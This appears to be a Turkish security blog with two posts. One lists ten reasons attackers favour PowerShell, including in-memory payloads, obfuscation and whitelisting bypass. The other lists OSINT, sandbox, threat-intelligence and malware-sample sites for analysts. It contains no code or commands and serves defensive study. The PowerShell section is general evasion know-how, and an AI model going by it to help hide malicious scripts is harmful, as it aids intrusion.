23 Kasım 2019 Cumartesi

The Increased use of powershell in attacks

The 10 top reasons why attackers use PowerShell 

1. It is installed by default on all new Windows computers.
2. It can execute payloads directly from memory, making it stealthy.
3. It generates few traces by default, making it difficult to find under forensic analysis.
4. It has remote access capabilities by default with encrypted traffic.
5. As a script, it is easy to obfuscate and difficult to detect with traditional security tools.
6. Defenders often overlook it when hardening their systems.
7. It can bypass application-whitelisting tools depending on the configuration.
8. Many gateway sandboxes do not handle script-based malware well.
9. It has a growing community with ready available scripts.
10. Many system administrators use and trust the framework, allowing PowerShell malware to blend in with regular administration work.

fileless attacks ile ilgili görsel sonucu
Fileless attacks


Referances:
Real full guide here!
https://www.crowdstrike.com/blog/blocking-malicious-powershell-downloads/
https://bensanchez.jp/fileless-malware-obfuscating-malware-using-powershell-scripts/
https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html
https://www.mcafee.com/enterprise/es-es/security-awareness/ransomware/what-is-fileless-malware.html

10 Kasım 2019 Pazar

Useful OSINT Tools for Cyber Threat Hunting and Analysis



Zararlı yazılım analizi, tehdit istihbaratı, güvenlik olayları analizi, kaynağı bilinmeyen ağ trafiği analizi ve ioc bilgileri vb. kontrolü için sıklıkla online ücretli, ücretsiz farklı platformları güvenlik olayları analizi ile uğraşırken kullanıyoruz. Bu platformlar kimi zaman bir tehditi anlamlandırmaya, kimi zaman bir domainin kime ait olduğunu sorgulamaya, kimi zaman lokasyon farketmeksizin başlayan bir spear phishing kampanyasından haberdar olmaya kadar SOME personeline bu olayları daha iyi anlaması ve analiz etmesi konusunda imkan sağlıyor. Bende zaman zaman analiz yaparken bu araçlardan işimi kolaylaştıracağı ölçüde faydalanıyorum. OSINT tanım olarak değerlendirecek olursak; herkesin erişimine açık kaynaklar üzerinden yapılan araştırmalar neticesinde hedef hakkında bilgiler elde edilmesine Açık kaynak istihbaratı(OSINT) deniyor. Bu yazıyı yazmamdaki amacım sıklıkla kullandığım araçlar ile ilgili bu listeyi oluşturup blogumu ziyaret edenlerinde yapmış oldukları analizde daha önce kullanmamış oldukları bir araç varsa bundan faydalanıyor olabilmeleri. Ki umarım faydası olur. OSINT ile ilgili aşağıdaki görsel bize linkteki domain aslında OSINT yaparken nelerden faydalanabileceğimiz ile ilgili bize fırsatlar sağlıyor. Sizde daha detaylı bilgi için ziyaret edip baloncuklar üzerine tıklayarak faydalanabilirsiniz.


































    Automated Analysis/Sandboxes:


    • https://app.any.run
    • https://analyze.intezer.com/
    • https://www.hybrid-analysis.com/
    • https://www.virustotal.com/gui/home/upload
    • https://app.sndbox.com/
    • https://cuckoo.cert.ee/
    • https://cape.contextis.com/
    • https://sandbox.anlyz.io/dashboard
    • https://valkyrie.comodo.com
    • http://cloud.iobit.com
    • https://detux.org/index.php
    • https://quicksand.io/
    • https://totalhash.cymru.com/upload/
    • https://x.threatbook.cn/about
    • https://nodistribute.com/
    • https://vicheck.com/submitfile.php
    Threat Intelligence/Research:
    • https://mxtoolbox.com/
    • https://dnsdumpster.com/
    • https://censys.io/
    • https://findsubdomains.com/
    • https://publicwww.com/
    • https://apt.threattracking.com/
    • https://pan-unit42.github.io/playbook_viewer
    • https://www.binaryedge.io/
    • https://www.shodan.io/
    • https://exchange.xforce.ibmcloud.com/
    • https://www.threatminer.org/
    • https://otx.alienvault.com/
    • https://community.riskiq.com/home
    • https://talosintelligence.com/
    • https://pulsedive.com/
    • https://ui.threatstream.com/login?redirect=%2Fdashboard
    • https://threatpoint.checkpoint.com/ThreatPortal/emulation
    • https://analyze.intezer.com/#/
    • https://exchange.xforce.ibmcloud.com/
    • https://threatintelligenceplatform.com/
    • https://dnsdumpster.com/
    Reputation Lookups Tools(IP/Hash/Url/Mac/Ssl/Dns/Seo):
    • https://totalhash.cymru.com/
    • https://www.scumware.org/search.php
    • http://sitereview.bluecoat.com
    • https://zulu.zscaler.com/
    • https://urlscan.io/
    • http://app.webinspector.com/
    • https://www.threatcrowd.org/
    • https://www.brightcloud.com/tools/url-ip-lookup.php
    • http://www.ipvoid.com/
    • https://crt.sh/
    • https://dnslytics.com/
    • https://metadefender.opswat.com/
    • https://exonerator.torproject.org/
    • https://developers.whatismybrowser.com
    • https://macvendors.com
    • https://www.abuseipdb.com/
    • https://centralops.net/co/DomainDossier.aspx
    • http://whois.domaintools.com/
    • https://tools.wmflabs.org/whois/gateway.py?
    • https://urlfiltering.paloaltonetworks.com  
    • https://csi.forcepoint.com/
    • https://fortiguard.com/webfilter
    • http://urlquery.net/
    • https://sitecheck.sucuri.net
    • https://community.riskiq.com/search/
    • https://metadefender.opswat.com/#!/scan-file
    • https://cymon.io/
    • https://www.malwareurl.com/listing-urls.php
    • https://zulu.zscaler.com/
    • https://talosintelligence.com/reputation_center/email_rep
    • https://www.threatcrowd.org/
    • https://www.threatminer.org/
    • https://www.abuseipdb.com/
    • https://spyse.com/search/certificate
    • http://bs.org.tr/phishing-domain-list
    • https://www.echotrail.io/insights/search/
    • https://www.robtex.com/dns-lookup/
    • http://moonsearch.com/
    • https://www.malwares.com/search/tag?tag=ransomware

    Miscellanous Tools:
    • https://gchq.github.io/CyberChef/
    • https://onlinedisassembler.com/odaweb/
    • https://start.me/p/rxRbpo/ti
    • https://malshare.com/
    • https://iplogger.org/
    • https://shrib.com/
    • https://www.itextpad.com/
    • https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx
    • https://maltiverse.com/search
    • http://moonsearch.com/
    • https://labs.inquest.net/
    • http://www.urlvir.com/

    Online Test Tools:
      • https://www.browserling.com/
      • https://visualping.io/
      • https://ping.eu/
      • https://www.uptrends.com/tools/uptime
      • https://urlscan.io/
      • https://centralops.net/co/
      • https://trumail.io/
      • https://builtwith.com/


      Security Blogs/News:


      • https://malware-traffic-analysis.net/
      • https://broadanalysis.net/
      • https://blog.malwarebytes.com/
      • https://myonlinesecurity.co.uk/
      • https://cofense.com/blog/
      • https://threatpost.com/blog/
      • https://krebsonsecurity.com/
      • https://blog.trendmicro.com/trendlabs-security-intelligence/
      • https://unit42.paloaltonetworks.com/
      • https://blog.paloaltonetworks.com/
      • https://www.zscaler.com/blogs/research
      • https://securelist.com/
      • https://www.wired.com/category/threatlevel/
      • https://www.proofpoint.com/us/blog
      • https://www.sentinelone.com/blog/
      • https://www.zdnet.com/
      • https://thehackernews.com/
      • https://www.bleepingcomputer.com/
      • https://www.flashpoint-intel.com/blog/
      • https://research.checkpoint.com/
      • https://blogs.cisco.com/security
      • https://www.cyberbit.com/blog/
      • https://www.fireeye.com/blog.html
      • https://nakedsecurity.sophos.com/
      • https://isc.sans.edu
      Malware/Threat Analysis Tools:
      • https://www.packettotal.com/
      • https://www.networktotal.com/analysis.phtml
      • https://avcaesar.malware.lu/
      • https://x.threatbook.cn/about
      • https://www.randhome.io/blog/2018/02/23/harpoon-an-osint-/-threat-intelligence-tool/

      Brand Protection:
      • https://services.normshield.com/phishing-domain-search
      • https://www.normshield.com/rapid-cyber-risk-scorecard/
      • http://bs.org.tr/phishing-domain-list
      • https://www.immuniweb.com/radar/?id=eQrS38Ky
      • https://builtwith.com/

      DeepWeb:
      • https://darknetlive.com/
      • https://github.com/CHEF-KOCH/ProjectX
      • https://www.tor2web.org/
      • https://fproxy.net/
      • https://xmrchain.net/


      Threat Feed

      • https://urlhaus.abuse.ch/
      • https://ransomwaretracker.abuse.ch/
      • https://threatfeeds.io/
      • https://phishstats.info/
      • https://infosec.cert-pa.it/analyze/listdomains.txt

      Ddos & Attack Monitoring:
      • https://ddosmon.net/
      • https://www.digitalattackmap.com/
      • https://horizon.netscout.com/
      • https://threatmap.checkpoint.com/
      • https://cybermap.kaspersky.com/
      • https://threatmap.fortiguard.com/
      • https://www.fireeye.com/cyber-map/threat-map.html
      • https://threatmap.bitdefender.com/
      • https://map.lookingglasscyber.com/
      • http://www.parsecuremap.com/#2/42.3/-17.7
      • https://securitycenter.sonicwall.com/m/page/worldwide-attacks

      Source Code Analysis

      Passive Dns Data:
      • https://securitytrails.com/dns-trails#/
      • https://passivedns.mnemonic.no/search
      • http://ptrarchive.com/
      • https://www.d4-project.org/
      • http://research.domaintools.com/research/hosting-history/
      • https://completedns.com/dns-history/
      • https://whoisrequest.com/
      • https://www.deteque.com/news/passive-dns/
      Certificate Fingerprint:



      Malicious Samples:

      • https://malshare.com/index.php
      • https://malquarium.org/
      • https://virusshare.com/


      Yara Rules:

      • https://github.com/kevthehermit/YaraRules


      Twitter Intelligence:

      • http://tweettioc.com/search

      Malware Tracker:

      • http://malwares.com
      • http://vxvault.net/ViriList.php

      Sigma Rules:
      Lookup Tools:


      • https://www.ultratools.com/tools/spamDBLookup
      • https://mxtoolbox.com/blacklists.aspx
      • https://w3dt.net/tools/dnsbl
      • https://www.abuseipdb.com/
      • https://apility.io/
      • https://megritools.com/blacklist-lookup

      Referanslar:

      Blog Arşivi